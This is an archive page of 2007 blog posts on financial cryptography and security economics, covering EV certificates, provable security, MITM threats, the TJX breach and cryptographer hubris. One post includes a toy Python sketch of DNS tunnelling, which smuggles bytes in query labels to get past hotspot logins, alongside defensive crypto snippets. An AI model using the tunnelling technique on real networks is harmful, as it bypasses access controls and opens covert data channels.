    Some older notes.

    Military intel is now accessing bank accounts of US persons. Now, this falls somewhat in the bucket of "expected" so why comment? Two possible reasons. Firstly, because we have a number:

    Military intelligence officials have used the letters in about 500 investigations over the past five years, while the CIA issues a 'handful' of such letters every year, The Times wrote on its website late Saturday. Civil rights experts and defence lawyers were critical of the practice.

    In comparison, the domestic law enforcement agency, the Federal Bureau of Investigation (FBI), makes much more frequent use of the letters to get financial information, and served about 9,000 such letters in 2005 alone, said justice officials.

    (Old dead link.) With numbers, we can calculate risk scenarios for financial cryptography applications. (It might be more interesting to some, for example, to look at total Internet intercepts; but we could hazard a guess that this is the same order of magnitude.)

    The Times cited two examples where the military used the letters - one was a government contractor with unexpected wealth, another was a Muslim chaplain at Guantanamo Bay prison for terrorist suspects.

    Secondly, because of the above privacy question. Concentrate on the first case: this is a clear suggestion of fraud. That's a regular crime. There are courts, judges, prosecutors, defence attorneys, and PIs lined up from coast to coast in the US for that sort of thing. So why did the military bypass normal chains of investigation and prosecution, and use the nuclear option?

    Because it could. There is no climate of fear of prosecution for overstepping the bounds. There is no particular sense that tools should be limited in use. This would support a finding that data will be misused.

    Caveat: we probably need to verify those statements before getting too confident.

    Posted by iang at 05:29 AM | Comments (1) | TrackBack

    May 23, 2007

    PKI moving to adopt the plugin model -- realignment to security based on user-needs?

    One of the things that occurred in the early days of phishing was the realisation that the browser (and its manufacturer) was ill-suited to dealing with the threat, even though it was the primary security agent (cf. the SSL promise to defeat the MITM). One solution I pushed a lot was plugin security -- adding the authentication or authorisation logic into plugins so that different techniques could experiment and evolve.

    In hindsight, this will appear obvious. 99% of the client-side security work involved plugins -- Trustbar, Netcraft, Petname, Ping's design, and many others. But it required a mindshift from "this is a demo" to "this is where it should be." This became poignant in the discussions of what to do about EV -- if Mozilla adopted EV into the browser, that opened a huge can of worms. Hence, putting EV in the plugin was the logical conclusion.

    Now it seems to have happened:

    Verisign Inc. has [...snip] released a Firefox plugin that will show the same type of green address bar that is displayed by Internet Explorer 7 when it lands on certain highly trusted Web sites that use Extended Validation Secure Sockets Layer (EV SSL) certificates.

    Before companies like Verisign will issue an EV SSL certificate, they take extra steps to make sure that it is going to a legitimate organization. For example, they will make sure that the business in question is registered with local authorities, has a real address, and actually has control over the Web domain in question.

    Earlier, I suggested that understanding EV in terms of security is futile. More, look to structural issues:

    Verisign's Tim Callan says that more than 500 Web sites, including sites run by eBay's PayPal division and ING Group, have now completed EV SSL certification. Nearly 90 percent of them are certified by Verisign, said Callan, a director of product marketing with the company's SSL group.

    That was the plan. Consider how much value there is for the other CAs, scrabbling around for the crumbs of 10% of the market, versus the costs of the EV programme. Even more to the point:

    That's an important point because Verisign's Firefox plugin doesn't identify sites that are certified by its competitors. Callan said it would have been too much work to maintain a list of legitimate EV SSL providers. "At that point, we're creating a whole new simultaneous real-time checking system," he said. "We were willing to invest in this one-off code development, but we didn't want to inherit this legacy of constantly maintaining this service, especially because this is a stop-gap measure. At the end of the year, this will be built into Firefox proper."

    Can you say barriers to entry? Once a site has been EV'd by Verisign, it is unlikely to shift, and that's what they wanted. If that doesn't work, ask Callan to say OCSP, which is written large into the EV draft (!) specification ...

    Leaving aside the industry structural games, let's get back to PKI. There is a silver lining: EV means that it now becomes Verisign's responsibility to authenticate these sites to the user.

    The *only* way to do that is in a way that is clearly expressed as "by Verisign" and the plugin makes this clear. If the browser takes on that responsibility, it breaks the statement, and therein lies the future breach of EV and the past failure of the security model.

    We have long hammered on one of the failures of the SSL server certificate market: "all CAs are alike." They were not, are not, and cannot be, and why the developers hung on to this blatantly and obviously false myth was mystifying to me.

    Verisign has now broken it, and broken it good. For that we should all be thankful, and in time, we will see a differentiated CA market, which allows new products and new security postures to meet the divergent needs of users.

    Posted by iang at 10:13 AM | Comments (4) | TrackBack

    May 22, 2007

    No such thing as provable security?

    I have a lot of skepticism about the notion of provable security.

    To some extent this is just efficient hubris -- I can't do it, so it can't be any good. Call it chutzpah if you like, but there's slightly more to it than egotism: if I can't do it, that generally signals that businesses will have a lot of trouble dealing with it. Not because there aren't enough people better than me, but because, if those who can do it cannot explain it to me, then they haven't got much of a chance of explaining it to the average business.

    Added to that, there has been a steady stream of "proofs" that have been broken, and "proven systems" that have been bypassed. Looked at from a scientific, investigative point of view, generally the proof only works because the assumptions are so constrained that they eventually leave the realm of reality -- and that's a particularly dangerous thing to do in security work.

    Added to all that: the ACM is awarding its Gödel Prize for a proof that there is no proof:

    In a paper titled "Natural Proofs" originally presented at the 1994 ACM STOC, the authors found that a wide class of proof techniques cannot be used to resolve this challenge unless widely held conventions are violated. These conventions involve well-defined instructions for accomplishing a task that rely on generating a sequence of numbers (known as pseudo-random number generators). The authors' findings apply to computational problems used in cryptography, authentication, and access control. They show that other proof techniques need to be applied to address this basic, unresolved challenge.

    The findings of Razborov and Rudich, published in a journal paper entitled "Natural Proofs" in the Journal of Computer and System Sciences in 1997, address a problem that is widely considered the most important question in computing theory. It has been designated as one of seven Prize Problems by the Clay Mathematics Institute of Cambridge, Mass., which has allocated $1 million for solving each problem. It asks - if it is easy to check that a solution to a problem is correct, is it also easy to solve the problem? This problem is posed to determine whether questions exist whose answer can be quickly checked, but which require an impossibly long time to solve.

    The paper proves that there is no so-called "Natural Proof" that certain computational problems often used in cryptography are hard to solve. Such cryptographic methods are critical to electronic commerce, and though these methods are widely thought to be unbreakable, the findings imply that there are no Natural Proofs for their security.

    If so, this can count as a plus point for risk management, and a minus point for the school of no-risk security. However hard you try, any system you put in place will have some chances of falling flat on its face. Deal with it; the savvy financial cryptographer puts in place a strong system, then moves on to addressing what happens when it breaks.

    The "Natural Proofs" result certainly matches my skepticism, but I guess we'll have to wait for the serious mathematicians to prove that it isn't so ... perhaps by proving that it is not possible to prove that there is no proof?

    Posted by iang at 08:21 AM | Comments (3) | TrackBack

    May 18, 2007

    Is this Risk Management's Waterloo?

    So why can't we do it? In short, we do know that all security is really about risk management. So we just do risk management, right?

    Igor says we can do it, in comments. Chandler says it is hard. He lists a dozen or so reasons why.

    To which I'll add one: the attacker is aggressive. Whatever we measure, the attacker actively perverts. So, unlike insurance models, security doesn't work well with just statistics. Much as we say we need more data, if we had all the data in the world, and fixed what we could see, the attacker would simply move faster than we could.

    A trio of notes:

    • Note that this isn't to say that he is the uber-attacker, the Superman recently much discussed. He's just us, on the other side. Or, better yet, pick the middling competent programmer down the hall. We fix the bugs, why can't they? The point is to stop thinking in terms of a bipolar choice between an attacker as dense as mould and one as smart as Moriarty.
    • Another thing that Lynn has pointed out is that the attacker can outspend the defender, sometimes as much as by 100:1. Indeed, recently, the USG agencies were reported to receive $10m in funding ... for an attacker that is causing losses of more than a billion per year.
    • On the question of "more data," a meme that is somewhat current: the paper that Igor mentioned pointed to http://phishtank.com/ which is some sort of volunteer group to validate URLs, and provide data. They are the same people as http://openDNS.com/ which provide DNS with a phishing filter. Nice twist, but note the perversion.

    So, there are some issues here. Are there limits to the risk management approach, beyond the fact that it seems to be beyond the capabilities of the industry? Has it reached its Waterloo, against the active, mildly competent attacker with 100 times the spend?

    Posted by iang at 07:46 AM | Comments (5) | TrackBack

    May 17, 2007

    The Myth of the Superuser, and other frauds by the security community

    The meme is starting to spread. It seems that the realisation that the security community is built on self-serving myths leading to systemic fraud has now entered the consciousness of the mainstream world.

    Over on the Volokh Conspiracy, Paul Ohm exposes the Myth of the Superuser. His view is that, too often, the sense of the Superuser is one of the overpowering ability of this uber-attacker. Once this sense enters the security agenda, the belief that there is an all-powerful evil criminal mastermind out there, watching and waiting, leads us into dangerous territory.

    Ohm does not make the case that Superusers do not exist, but that their effect or importance is greatly exaggerated. I agree, and this is exactly the case I made for the MITM. In brief, the Man-in-the-middle is claimed to be out there lurking, and we must protect against him, at any cost. Wrong on all counts, and the result is a security disaster called phishing, which is itself an MITM.

    Then, phishing can be interpreted as a result of our obsession with Ohm's Superuser, the uber-attacker. In part, at least, and I'd settle for running the experiment without the uber-obsession. Specifically, Ohm points at some bad results he has identified:

    Very briefly, in addition to these two harms — overbroad laws and civil liberties infringements — the other four harms I identify are guilt by association (think Ed Felten); wasted investigative resources (Superusers are expensive to catch); wasted economic resources (how much money is spent each year on computer security, and is it all justified?); and flawed scholarship (See my comment from yesterday about DRM).

    All of which we can see, and probably agree on. What makes this essay stand out is that he goes the extra mile and examines what the root causes might be:

    I have essentially been saying that we (policymakers, lawyers, law professors, computer security experts) do a lousy job calculating the risks posed by Superusers. This sounds a lot like what is said elsewhere, for example involving the risks of global warming, the safety of nuclear power plants, or the dangers of genetically modified foods. But there is a significant, important difference: researchers who study these other risks rigorously analyze data. In fact, their focus on numbers and probabilities and the average person’s seeming disregard for statistics is a central mystery pursued by many legal scholars who study risk, such as Cass Sunstein in his book, Laws of Fear.

    In stark contrast, experts in the field of computer crime and computer security are seemingly uninterested in probabilities. Computer experts rarely assess a risk of online harm as anything but, “significant,” and they almost never compare different categories of harm for relative risk. Why do these experts seem so willing to abdicate the important risk-calculating role played by their counterparts in other fields?

    Does that sound familiar? To slide into personal anecdote, consider the phishing debate (the real one back in 2004 or so, not the current phony one).

    When I was convinced that we had a real problem, and people were ignoring it, I reasoned that the lack of scientific approach was what was holding people back from accepting the evidence. So I started collecting numbers on costs, breaches, and so forth (you'll see frequent posts on the blog, also mail postings around). I started pushing these numbers out there so that we had some grounding in what we were talking about.

    What happened? Nothing. Nobody cared. I was able around 2004 to state that phishing already cost the USA about a billion dollars a year, and sometime shortly after that, that basically all data was compromised. In fact, I'm not even sure when we passed these points, because ... it's not worth my trouble to even go back and identify it!

    Worse than nobody caring, the security field simply does not have the conceptual tools to deal with this. A little bit like "everyone was in denial", but worse: there is a collective glazed view of the whole problem.

    What's going on? Ohm identifies 4 explanations (in point form here, but read his larger descriptions):

    1. Pervasive secrecy...
    2. Everyone is an Expert...
    3. Self-Interest...
    4. The Need for Interdisciplinary Work...

    No complaint there! Readers will recognise those frequent themes, and we could probably collectively get it to a list of 10 explanations without too much mental sweat.

    But I would go further. Deeper. Harsher.

    I would suggest that there is one underlying cause, and it is structural. It is because security is a market for silver bullets, in the deep and economic sense explained in that long paper. All of the above arise, in varying degrees, in the market first postulated by Michael Spence.

    The problem with this is that it forces us to face truths that few can deal with. It asks us to choose between the awful grimness of helplessness and the temptation of the dark side of security fraud, before we can enter any semblance of a professional existence. Nobody wants to go there.

    Posted by iang at 08:21 AM | Comments (7) | TrackBack

    May 08, 2007

    Threatwatch: Still searching for the economic MITM

    One of the things we know is that MITMs (man-in-the-middle attacks) are possible, but almost never seen in the wild. Phishing is a huge exception, of course. Another fertile area is wireless LANs, especially around coffee shops. Correctly, people have pointed to this as a likely area where MITMs would break out.

    Incorrectly, people have typically confused possibility with action. Here's the latest "almost evidence" of MITMs, breathtakingly revealed by the BBC:

    In a chatroom used to discuss the technique, also known as a 'man in the middle' attack, Times Online saw information changing hands about how security at wi-fi hotspots – of which there are now more than 10,000 in the UK – can be bypassed.

    During one exchange in a forum entitled 'T-Mobile or Starbucks hotspot', a user named aarona567 asks: "will a man in the middle type attack prove effective? Any input/suggestions greatly appreciated?"

    "It's easy," a poster called 'itseme' replies, before giving details about how the fake network should be set up. "Works very well," he continues. "The only problem is,that its very slow ~3-4 Kb/s...."

    Another participant, called 'baalpeteor', says: "I am now able to tunnel my way around public hotspot logins...It works GREAT. The dns method now seems to work pass starbucks login."

    Now, the last paragraph is something else, it is referring to the ability to tunnel through DNS to get uncontrolled access to the net. This is typically possible if you run your own DNS server and install some patches and stuff. This is useful, and economically sensible for anyone to do, although technically it may be infringing behaviour to gain access to the net from someone else's infrastructure (laws and attitudes varying...).
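
    To see how the tunnelling trick works in principle, here's a toy sketch of the encoding side. It's my own illustration; the domain name and encoding are invented, and the real tools also chunk the stream, sequence the packets, and carry replies back in the DNS answers:

        # Toy sketch of DNS tunnelling's encoding side: smuggle bytes out in
        # the labels of queries for a domain whose authoritative server you run.
        import base64

        def encode_query(data: bytes, domain: str = "tunnel.example.com") -> str:
            # Base32 keeps the payload within the characters DNS permits.
            label = base64.b32encode(data).decode().rstrip("=").lower()
            return f"{label[:63]}.{domain}"   # a single DNS label tops out at 63 bytes

        # The hotspot's resolver forwards this lookup to your server, login
        # page or no login page -- the query itself is the covert channel.
        print(encode_query(b"GET / HTTP/1.0"))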

    So where's the evidence of the MITM? Guys talking about something isn't the same as doing it (and the penultimate paragraph seems to be talking about DNS tunnelling as well). People have been demoing this sort of stuff at conferences for decades ... we know it is possible. What we also know is that it is not a good use of your valuable time as a crim. People who do this sort of thing for a living search for techniques that give low visibility and high gathering capability. Broadcasting in order to steal a single username and password fails on both counts.

    If we were scientists, or risk-based security scholars, what we would need is evidence that they did the MITM *and* committed a theft in so doing. Only then would we know enough to allocate the resources to solving the problem.

    To wrap up, here is some *credible* news that indicates how to economically attack users:

    Pump and dump fraudsters targeting hotels and Internet cafes, says FBI

    Cyber crooks are installing key-logging malware on public computers located in hotels and Internet cafes in order to steal log-in details that are used to hack into and hijack online brokerage accounts to conduct pump and dump scams.

    The US Federal Bureau of Investigation (FBI) has found that online fraudsters are targeting unsuspecting hotel guests and users of Internet cafes.

    When investors use the public computers to check portfolios or make a trade, fraudsters are able to capture usernames and passwords. Funds are then looted from the brokerage accounts and used to drive up the prices of stocks the fraudsters had bought earlier. The stock is then sold at a profit.

    In an interview with Bloomberg reporters, Shawn Henry, deputy assistant director of the FBI's cyber division, said people wouldn't think twice about using a computer in an Internet cafe or business centre in a hotel, but he warns investors not to use computers they don't know are secure.

    Why is this credible, and the other one not? Because the crim is not sitting there with his equipment -- he's using the public computer to do all the dangerous work.

    Posted by iang at 02:18 PM | Comments (1) | TrackBack

    May 07, 2007

    WSJ: Soft evidence on a crypto-related breach

    Unconfirmed claims are being made in the WSJ that the hackers in the TJX case did the following:

    1. sat in a carpark and listened into a store's wireless net.
    2. cracked the WEP encryption.
    3. scarfed up user names and passwords ....
    4. used that to access centralised databases to download the CC info.
    The TJX hackers did leave some electronic footprints that show most of their break-ins were done during peak sales periods to capture lots of data, according to investigators. They first tapped into data transmitted by hand-held equipment that stores use to communicate price markdowns and to manage inventory. "It was as easy as breaking into a house through a side window that was wide open," according to one person familiar with TJX's internal probe. The devices communicate with computers in store cash registers as well as routers that transmit certain housekeeping data.

    After they used that data to crack the encryption code the hackers digitally eavesdropped on employees logging into TJX's central database in Framingham and stole one or more user names and passwords, investigators believe. With that information, they set up their own accounts in the TJX system and collected transaction data including credit-card numbers into about 100 large files for their own access. They were able to go into the TJX system remotely from any computer on the Internet, probers say.

    OK. So assuming this is all true (and no evidence has been revealed other than the identity of the store where it happened), what can we say? Lots, and it is all unpopular. Here's a scattered list of things, with some semblance of connectivity:

    a. Notice how the crackers still went for the centralised database. Why? It is validated information, and is therefore much more valuable and economic. The gang was serious and methodical. They went for the databases.

    Conclusion: Eavesdropping isn't much of a threat to credit cards.

    b. Eavesdropping is a threat to passwords, assuming that is what they picked up. But, we knew that way back, and that exact threat is what inspired SSH: eavesdroppers sniffing for root passwords. It's also where SSL is most sensibly used.

    c. Eavesdropping is a threat, but MITM is not: by the looks of it, they simply sat there and sucked up lots of data, looking for the passwords. MITMs are just too hard to make them economic, *and* they leave tracks. "Who exactly is it that is broadcasting from that car over there....?"

    (For today's almost evidence of the threat of MITMs see the BBC!)

    d. Therefore, SSL v1 would have been sufficient to protect against this threat level. SSL v2 was overkill, and over-expensive: note how it wasn't deployed to protect the passwords from being eavesdropped. Neither was any other strong protocol. (Standard problem: most standardised security protocols are too heavy.)

    TJX and 45 million Americans say "thanks, guys!" I reckon it is going to take the other 255 million Americans to lose big time before this lesson is attended to.

    e. Why did they use a weak crypto protocol? Because it is the one delivered in the hardware.

    Question: Why is hardware often delivered with weak crypto?

    f. And, why was a weak crypto protocol chosen by the WEP people? And why are security observers skeptical that the new replacement for WEP will last any longer? The solution isn't in the "guild" approach I mentioned earlier, so forget ranting about how people should use a good security expert. It's in the institutional factors: security is inversely proportional to the number of designers. And anything designed by an industry cartel has a lot of designers.

    g. Even if they had used strong crypto, could the breach have happened? Yes, because the network was big and complex, and the hackers could have simply plugged into some place elsewhere. Check out the clue here:

    The hackers in Minnesota took advantage starting in July 2005. Though their identities aren't known, their operation has the hallmarks of gangs made up of Romanian hackers and members of Russian organized crime groups that also are suspected in at least two other U.S. cases over the past two years, security experts say. Investigators say these gangs are known for scoping out the least secure targets and being methodical in their intrusions, in contrast with hacker groups known in the trade as "Bonnie and Clydes" who often enter and exit quickly and clumsily, sometimes strewing clues behind them.

    Recall that transactions are naked and vulnerable. Because the data is seen in so many places, savvy FCers assume the transactions are visible by default, and thus vulnerable unless intrinsically protected.

    h. And, even if the entire network had been protected by some sort of overarching crypto protocol like WEP, the answer is to take over a device. Big stores means big networks means plenty of devices to take over.

    i. Which leaves end-to-end encryption. The only protection you can really count on is end-to-end. WEP, WPA, IPSec and other such infrastructure-level systems are only a hopeful answer to an easy question; end-to-end security protocols are the real answer to application-level questions.

    (e.g., they could have used SSL for protecting the password access to the databases, end to end. But they didn't.)
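
    To make point (i) concrete, here's a minimal sketch of application-level, end-to-end protection, using AES-GCM from the Python cryptography package. The field names are invented for illustration; the point is that every hop in between -- wireless link, store LAN, central database -- sees only ciphertext:

        # Minimal end-to-end sketch: the application encrypts the sensitive
        # field itself, so intermediate systems never see the plaintext.
        import os
        from cryptography.hazmat.primitives.ciphers.aead import AESGCM

        key = AESGCM.generate_key(bit_length=128)   # held by the two endpoints only
        aead = AESGCM(key)

        nonce = os.urandom(12)
        card_number = b"4111111111111111"           # illustrative test number
        record = nonce + aead.encrypt(nonce, card_number, b"txn-metadata")

        # Any system in between can store or forward `record`, but a breach
        # of the network or the database yields no usable card number.
        assert aead.decrypt(record[:12], record[12:], b"txn-metadata") == card_number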

    j. The other requirement is to make the data insensitive to breaches. That is, even if a crook gets all the packets, he can't do anything with them. Not naked, as it were. End-to-end encryption then becomes a privacy benefit, not a security necessity.

    However, to my knowledge, only Ricardo and AADS deliver this, and most other designers are still wallowing around in the mud of encrypted databases. A possible exception to this is the selective disclosure approach ... but for various business reasons that is even less likely to field than Ricardo and AADS were.

    k. Why don't we use more end-to-end encryption with naked transaction protocols? One reason is that they don't scale: we have to write one for each application. Another reason is that we've been taught not to, for generations: "you should use a standard security product." ... as seen by TJX, who *did* use a standard security product.

    Conclusion: Security advice is "lowest common denominator" grade. The best advice is to use a standard product that is inapplicable to the problem area, and if that's the best advice, that also means there aren't enough FC-grade people to do better.

    l. "Oh, we didn't mean that one!" Yeah, right. Tell us how to tell? Better yet, tell the public how to tell. They are already being told to upgrade to WPA, as if improving 1% of their network from 20% security to 80% security is going to help.

    m. In short, people will seize on the encryption angle as the critical element. It isn't. If you are starting to feel confused by the multiplying conflicts, the silly advice, and the sense of powerlessness the average manager has, you're starting to understand.

    This is messy stuff, and you can pretty much expect most people to not get it right. Unfortunately, most security people will get it wrong too in a mad search for the single most important mistake TJX made.

    The real errors are systemic: why are they storing SSNs anyway? Why are they using a single number for the credit card? Why are retail transactions so pervasively bound with identity, anyway? Why is it all delayed credit-based anyway?

    Posted by iang at 02:27 PM | Comments (4) | TrackBack

    April 29, 2007

    Dr Geer goes to Washington

    To round out this weekend's security hubris special, "Dr. Geer goes to Washington." To tell them how much trouble the net is in, seemingly. His points were 5-fold:

    Summary
    • We need a system of security metrics, and it is a research grade problem.
    • The demand for security expertise outstrips the supply, and it is a training problem and a recruitment problem.
    • What you cannot see is more important than what you can, and so the Congress must never mistake the absence of evidence for the evidence of absence, especially when it comes to information security.
    • Information sharing that matters does not and will not happen without research into technical guarantees of non-traceability.
    • Accountability is the idea whose time has come, but it has a terrible beauty.

    Yes to his points 1, 3, 4 and 5, and we should read them. Which leaves:

    Priority number two: The demand for security expertise outstrips the supply.

    Information security is perhaps the hardest technical field on the planet. Nothing is stable, surprise is constant, and all defenders work at a permanent, structural disadvantage compared to the attackers. Because the demands for expertise so outstrip the supply, the fraction of all practitioners who are charlatans is rising. Because the demands of expertise are so difficult, the training deficit is critical. We do not have the time to create, as if from scratch, all the skills required. We must steal them from other fields where parallel challenges exist. The reason cybersecurity is not worse is that a substantial majority of top security practitioners bring other skills into the field; in my own case, I am a biostatistician by training. Civil engineers, public health practitioners, actuaries, aircraft designers, lawyers, and on and on — they all have expertise we can use, and until we have a training regime sufficient to supply the unmet demand for security expertise we should be both grateful for the renaissance quality of the information security field and we should mine those other disciplines for everything we can steal. If you can help bring people into the field, especially from conversion, then please do so. In the meantime, do not believe all that you hear from so-called experts. Santayana had it right when he said that “Skepticism is the chastity of the intellect; it is shameful to give it up too soon, or to the first comer.”

    Well! An alternate but not radically diverging opinion.

    Thanks to Gunnar

    Posted by iang at 06:17 PM | Comments (1) | TrackBack

    Security Expertise from Cryptographers: the Signals of Hubris

    Over on the crypto forum, an old debate restarted where some poor schmuck made the mistake of asking why CBC mode should not have an IV of all zeros.

    For the humans out there, a "mode" is a way of using a block cipher ("encrypts only a block") to encrypt a stream. CBC mode chains each block to the next by feeding the results from the last into the next ("cipher-block-chaining"). But we need an initial value (IV) to start the process. In the past, zeros were suggested as good enough.

    The problem is that if you use the same starting key, and the user sends the same packet, then the encrypted results will be the same (a block cipher being deterministic, generally). So we use a different IV for every different use of the secret key, in order to cause different results, and hide the fact that the same packet is being sent. (There are also some other difficulties, but these are not only much more subtle, they are beyond my ability to write about, so I'll skip past them blithely.)
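
    To make the determinism concrete, here is a minimal sketch, assuming the pyca/cryptography package; the key, packet and helper names are mine, purely illustrative. Same key, same packet, all-zeros IV: byte-for-byte identical ciphertexts. Fresh random IV: different ciphertexts.

        import os
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

        key = os.urandom(16)
        packet = b"ATTACK AT DAWN!!"   # exactly one 16-byte AES block

        def encrypt_cbc(key, iv, plaintext):
            # AES-CBC over a single block; real use needs padding for other sizes
            enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
            return enc.update(plaintext) + enc.finalize()

        zero_iv = bytes(16)
        # Zero IV: an eavesdropper learns the same message was sent twice.
        assert encrypt_cbc(key, zero_iv, packet) == encrypt_cbc(key, zero_iv, packet)

        # Random IV per message: the repetition is hidden (with overwhelming
        # probability the two ciphertexts differ).
        assert encrypt_cbc(key, os.urandom(16), packet) != encrypt_cbc(key, os.urandom(16), packet)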

    Back to the debate. Predictably, there was little controversy over the answer ("you can't do that!"), some controversy over the fuller answer (what to do), but also more controversy over the attitude. In short, the crypto community displayed what might be considered a severe case of hubris:

    "If you don't know, then you had better employ a security expert who does!"

    There are many problems with this. Here's some of them:

    1. At a guess, designing secure protocols is 50% business, 40% software, 10% crypto. So when you say "employ a security expert" we immediately have the problem that security is many disciplines. A security expert might know a lot about cryptography, or he might know very little. What we can't reasonably expect is that a security expert knows a lot about everything.

    Something has to be cut out, and as security -- the entire field -- only rarely and briefly depends on cryptography, it seems reasonable that your average security expert knows only the basics of cryptography.

    Adi Shamir said in his list of misconceptions in cryptography:

    By implementers: Cryptography solves everything, but:
    • only basic ideas are successfully deployed
    • only simple attacks are avoided
    • bad crypto can provide a false sense of security

    What then are the basics? Block ciphers are pretty basic. Understanding all the ins and outs of modes and IVs, however, is not. Where we draw the line is in knowing our own limitations, so the original question ("what's wrong with an IV of all zeros?") indicates quite good judgement.

    2. But what about software? We can see it in the cryptographers' view:

    "Just use a unique IV."

    Although this sounds simple, it is a lot harder to implement than to say, and the person who gets to be responsible for the reality is the programmer. In glorious, painful detail.

    Consider this: say you choose to put random numbers in the IV, and then you specify that the protocol must have a good RNG ("random number generator"). Then, how do you show that this is what actually happens? How can you show that the user's implementation has a good RNG? Big problem: you can't. And this has been an ignored problem for basically the entire history of Internet cryptography.
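
    As a hedged illustration of why a "good RNG" requirement cannot be verified from outside, here is a toy check in Python (3.9+); the test and all names are my own invention. A fully predictable generator seeded with a constant passes a simple statistical sanity test just as comfortably as the operating system's entropy source does.

        import os
        import random

        def looks_random(data: bytes) -> bool:
            # Crude monobit test: roughly half of all bits should be set.
            ones = sum(bin(b).count("1") for b in data)
            return abs(ones - len(data) * 4) < len(data)   # generous tolerance

        good = os.urandom(4096)                   # OS-grade entropy
        bad = random.Random(0).randbytes(4096)    # fixed seed: fully predictable

        print(looks_random(good), looks_random(bad))   # True True

    No black-box test can tell these apart, which is exactly the point: the specification says "good RNG," and the implementation cannot show that it has one.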

    Dilbert on Randomness

    This would suggest that if you are doing secure protocols, what you want is someone who knows more about software than cryptography, because you want to know the costs of those choices more than you want to know the snippety little details.

    3. Unfortunately, cryptography has captured attention as a critical element of security. Software, on the other hand, is less interesting; just ask any journalist.

    Because of this, crypto has become a sort of rarified unchallengeable beast in technological society, an institution more displaying of religious beliefs than cold science. Mere software engineers can rarely debate the cryptographers as peers, even the most excellent ones (like Zooko, Hal Finney and Dani Nagy) who can seriously write the maths.

    So while I suggest that software is more important to the end result than cryptography, the programmers still lose in the face of assumed superiority. "Employ someone better than you" smacks of false professionalism, guildmaking. It's simple enough economics; if we as a group can create an ethos like the medical industry, where we could become unchallenged authorities, then we can lock out competitors (who haven't passed the guild exam), and raise prices.

    Unfortunately, this raises the chance to near certainty that we also lock out people who can point out when we are off the rails.

    4. And, we can forget about the business aspects completely. That is, a focus on requirements is just not plausible for people who've buried themselves in mathematics for a decade, as they don't understand where the requirements come from. Talking about risk is a vague hand-wavy subject, better left alone because of its lack of absolute provability.

    By way of example, one of the questions in the recent debate was

    "you haven't heard of anyone breaking SD cards have you?"

    From a business perspective this makes complete sense, it is a completely standard risk perspective with theory to back it up (albeit a simplification); from a cryptographer's perspective it is laughable.

    Who's right? Actually, both perspectives have merit, and choosing the right approach is again the subject of judgement.

    5. Hence, a strong knee-jerk tendency to fall back on the old saws like the CIA of confidentiality, integrity and authentication. But it is generally easy to show that CIA and similar things are nice for crypto school but a bad start in real life.

    E.g., in the above debate, it turns out that the application in question is DRM -- Digital Rights Management. What do we know about DRM?

    If anything has been learnt at massive cost over the last 10 years of failed efforts, it is that DRM security does not have to be strong. Rather it has to create a discrimination between those who will pay and those who won't. This is a pure business decision. And it totally blows away the C, confidentiality, in CIA.

    Don't believe me? Buy an iPod. The point here is that if one analyses the market for music (or ringtones, or cell phones, apparently) then the last thing one cares about is being able to crack the crypto. If one analyses the market for anything, CIA turns out to be such a gross simplification that you can pretty much assume it to be wrong from the start.

    6. If you've subscribed to the above, even partly, you might then be wondering how we can tell a good security expert from a bad one. Good question!

    Even I find it difficult, and I design the stuff (not at the most experienced level, but well above hobby level). It is partly for that reason that I name financial cryptographers on the blog: to develop a theory of just how to do this.

    How is a manager who has no experience in this going to pick from a room full of security experts, who mostly disagree with each other? Basically, you're stuffed, mate!

    So where does that leave us? Steve Bellovin says that when we hire a security expert, we are hiring his judgement, not his knowledge of crypto. Which means knowing when to worry, and especially _when not to worry_, and I fully agree with that! So how then do we determine someone's judgement in security matters?

    Here's a scratched-down emerging theory of signals of security judgement:

    BAD: If someone says "you need to hire a security expert, because you don't know enough, and that could be dangerous" that's a red-flag.

    GOOD: If they ask what the requirements are, that's good.

    BAD: If they assume CIA before the requirements, that's bad.

    GOOD: If they ask what the application is, then a big plus.

    BAD: If they say "use a standard protocol" then that's bad.

    GOOD: If they say "this standard protocol may be a good starting point" then that's good.

    BAD: If they know what goes wrong when an IV is not perfect, that's a danger sign.

    GOOD: If they know enough to say "we have to be careful of the IV" then that's good.

    BAD: If they don't know what risk is, they cannot reduce your risk.

    GOOD: If they know more software than crypto, that's golden.

    Strongly oriented to weeding out those who know too much about cryptography, it seems.

    Sadly, the dearth of security engineers who don't subscribe to the hubristic myths leaves us with an unfortunate result: the job is left up to you. This has been the prevalent result of so many successful Internet ventures that it is a surprise it isn't more widely recognised. I'm sufficiently convinced that I think it has reached the level of a Hypothesis:

    "It's your job. Do it."

    Hubris? Perhaps! It's certainly your choice to either do it yourself, or hand it over to a security expert, so let's hear your experiences!

    Posted by iang at 05:42 PM | Comments (2) | TrackBack

    April 27, 2007

    Breached *and* sued -- is TJX the tipping point to liability alignment?

    TJX is to be sued. The huge data breach by the US retailer is news covered elsewhere, as it is just the biggest in a series of similar ones.

    The suit will argue that TJX failed to protect customer data with adequate security measures, and that the Framingham, Mass.-based retail giant was less than honest about how it handled data.

    What is interesting is that this could be the first time that someone big says "boo!" If the banks are now getting together to sue TJX for doing the wrong thing, this sets an interesting precedent: the banks say (presumably) that TJX was negligent and caused damages.

    If the courts find this worthy of remedy, then the reverse is possible too. Other suits are possible. If the banks lose the data, then maybe they should be sued? If Microsoft's OS is shown to be insecure and susceptible to lost data, then maybe it should be sued? Or the banks that quite happily permitted it to be used, again? If someone pushes a particular product for commercial purposes (such as a firewall, a secure token, an encryption protocol, or just advice...) and it is shown to be materially involved in a breach, maybe the pusher needs to be sued?

    What would this mean? A lot of suits, for one thing, such as the one being readied against Paypal. A lot of money wasted, and the lawyers get richer. Some banks, some suppliers, some pushers and some users might modify their behaviour. Others might just get more defensive.

    That may be bad ... but what's our alternative?

    Suppliers and sellers of bad products have not been punished. Neither have buyers of bad products. Leaving aside the sense of blame and revenge, where is the feedback loop that tells a company that "buying that was wrong, that hurts?" Where is the message that says "you shouldn't use that software for online banking" to the user?

    To address this lack of feedback, lack of confirmed danger, many have suggested government action. But, other than the spectacular exception of the SB1386 data breach disclosure law, most government laws and interventions have made matters worse, not better.

    Economists like those going to WEIS2007 have suggested many things: Align the incentives, share more breach information amongst victims, make software vendors liable, etc etc. I suspect that one common rejoinder here is that the very economics that explains the problem often gives clues as to why it isn't solved.

    Some mad crypto people have even suggested designing security into the system in the first place. Yet other fruitcakes have said that designing the wrong security in was what got us to where we are now...

    What doesn't seem clear from an outside, global, society perspective is ... what to do?! None of those approaches are going to "just work," even if they are adopted.

